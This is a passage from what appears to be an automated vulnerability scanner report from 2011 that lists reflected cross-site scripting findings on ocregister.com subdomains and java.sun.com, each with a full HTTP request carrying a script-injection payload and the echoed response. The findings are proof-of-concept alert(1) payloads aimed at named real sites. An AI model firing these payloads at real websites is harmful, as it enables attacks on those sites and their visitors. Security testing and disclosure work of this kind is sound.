GET /4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab HTTP/1.1 Host: java.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 03 Feb 2011 16:20:10 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sun Microsystems</title> <!-- BEGIN METADATA --> <meta http-equiv="content-type" content="text/html; charse ...[SNIP]... <a href="/contact/feedback.jsp? referer=http://java.sun.com/notfound.jsp &requrl=http://java.sun.com/4966c"style="x:expression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab &refurl=http://java.sun.com/UserTypedUrl &category=se"> ...[SNIP]...
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload da001<script>alert(1)</script>1c47112440a was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8adda"><script>alert(1)</script>15e0db13ad7 was submitted in the REST URL parameter 5. This input was echoed as 8adda\"><script>alert(1)</script>15e0db13ad7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/oceanfront-with-killer-views-a-deal/142248adda"><script>alert(1)</script>15e0db13ad7/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... el="alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/142248adda\"><script>alert(1)</script>15e0db13ad7/feed/" /> ...[SNIP]...
1.177. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7745"><script>alert(1)</script>ced09a70bf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7745\"><script>alert(1)</script>ced09a70bf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745"><script>alert(1)</script>ced09a70bf4=1 HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14224>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... lication/rss+xml" title=" Oceanfront with killer views a deal? - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745\"><script>alert(1)</script>ced09a70bf4=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f68e"><script>alert(1)</script>a746ad081d4 was submitted in the REST URL parameter 5. This input was echoed as 9f68e\"><script>alert(1)</script>a746ad081d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e"><script>alert(1)</script>a746ad081d4/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e\"><script>alert(1)</script>a746ad081d4/feed/" /> ...[SNIP]...
1.179. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 366d8"><script>alert(1)</script>65b84b53c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 366d8\"><script>alert(1)</script>65b84b53c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8"><script>alert(1)</script>65b84b53c1=1 HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14020>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... /rss+xml" title=" Laguna Beach home sales up 13% over year - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8\"><script>alert(1)</script>65b84b53c1=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b73"><script>alert(1)</script>49eaba8a56a was submitted in the REST URL parameter 5. This input was echoed as 79b73\"><script>alert(1)</script>49eaba8a56a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/really-no-housing-slump-in-san-marino/9774079b73"><script>alert(1)</script>49eaba8a56a/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/9774079b73\"><script>alert(1)</script>49eaba8a56a/feed/" /> ...[SNIP]...
1.181. http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2156"><script>alert(1)</script>7f4f3a0d6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2156\"><script>alert(1)</script>7f4f3a0d6f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156"><script>alert(1)</script>7f4f3a0d6f7=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156\"><script>alert(1)</script>7f4f3a0d6f7=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9132"><script>alert(1)</script>89260b73642 was submitted in the REST URL parameter 5. This input was echoed as a9132\"><script>alert(1)</script>89260b73642 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/a-new-home-for-kobe-bryant/97596a9132"><script>alert(1)</script>89260b73642/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596a9132\"><script>alert(1)</script>89260b73642/feed/" /> ...[SNIP]...
1.183. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://lansner.ocregister.com
Path:
/2011/02/02/a-new-home-for-kobe-bryant/97596/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa939"><script>alert(1)</script>23a10abfd00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa939\"><script>alert(1)</script>23a10abfd00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939"><script>alert(1)</script>23a10abfd00=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=97596>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 117579
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... ternate" type="application/rss+xml" title=" A new home for Kobe Bryant? - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939\"><script>alert(1)</script>23a10abfd00=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6f3"><script>alert(1)</script>2d65ca2126c was submitted in the REST URL parameter 5. This input was echoed as ec6f3\"><script>alert(1)</script>2d65ca2126c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3"><script>alert(1)</script>2d65ca2126c/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3\"><script>alert(1)</script>2d65ca2126c/feed/" /> ...[SNIP]...
1.185. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e2a"><script>alert(1)</script>2f16017d2e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37e2a\"><script>alert(1)</script>2f16017d2e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a"><script>alert(1)</script>2f16017d2e8=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98070>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... application/rss+xml" title=" Homebuilding slump now 3 years old - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a\"><script>alert(1)</script>2f16017d2e8=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de683"><script>alert(1)</script>9b3add21ddf was submitted in the REST URL parameter 5. This input was echoed as de683\"><script>alert(1)</script>9b3add21ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/orange-county-property/98182de683"><script>alert(1)</script>9b3add21ddf/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52454
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182de683\"><script>alert(1)</script>9b3add21ddf/feed/" /> ...[SNIP]...
1.187. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://lansner.ocregister.com
Path:
/2011/02/03/orange-county-property/98182/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abaf"><script>alert(1)</script>e1b7c34c143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6abaf\"><script>alert(1)</script>e1b7c34c143 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/orange-county-property/98182/?6abaf"><script>alert(1)</script>e1b7c34c143=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98182>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 145345
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... pe="application/rss+xml" title=" 5th straight jump for O.C. property index - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/?6abaf\"><script>alert(1)</script>e1b7c34c143=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 969aa"><script>alert(1)</script>21e3c1a89f6 was submitted in the REST URL parameter 1. This input was echoed as 969aa\"><script>alert(1)</script>21e3c1a89f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category969aa"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category969aa\"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35fdf"><script>alert(1)</script>012deb55675 was submitted in the REST URL parameter 2. This input was echoed as 35fdf\"><script>alert(1)</script>012deb55675 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/outlooks35fdf"><script>alert(1)</script>012deb55675/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Eyeball ’11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks35fdf\"><script>alert(1)</script>012deb55675/eyeball-11/feed/" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1d12"><script>alert(1)</script>f582b534ec7 was submitted in the REST URL parameter 3. This input was echoed as f1d12\"><script>alert(1)</script>f582b534ec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/outlooks/eyeball-11f1d12"><script>alert(1)</script>f582b534ec7/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11f1d12\"><script>alert(1)</script>f582b534ec7/feed/" /> ...[SNIP]...
1.191. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://lansner.ocregister.com
Path:
/category/outlooks/eyeball-11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c705"><script>alert(1)</script>feb32e4d31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c705\"><script>alert(1)</script>feb32e4d31b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/outlooks/eyeball-11/?3c705"><script>alert(1)</script>feb32e4d31b=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Eyeball ’11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11/?3c705\"><script>alert(1)</script>feb32e4d31b=1feed/" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6706"><script>alert(1)</script>6bccede39c1 was submitted in the REST URL parameter 4. This input was echoed as b6706\"><script>alert(1)</script>6bccede39c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/states-economic-rock-bottom-closer-than-everb6706"><script>alert(1)</script>6bccede39c1 HTTP/1.1
Host: letters.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://letters.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/01/states-economic-rock-bottom-closer-than-everb6706\"><script>alert(1)</script>6bccede39c1feed/" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b12b"><script>alert(1)</script>29a0ab24421 was submitted in the REST URL parameter 4. This input was echoed as 2b12b\"><script>alert(1)</script>29a0ab24421 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b"><script>alert(1)</script>29a0ab24421 HTTP/1.1
Host: letters.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://letters.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53258
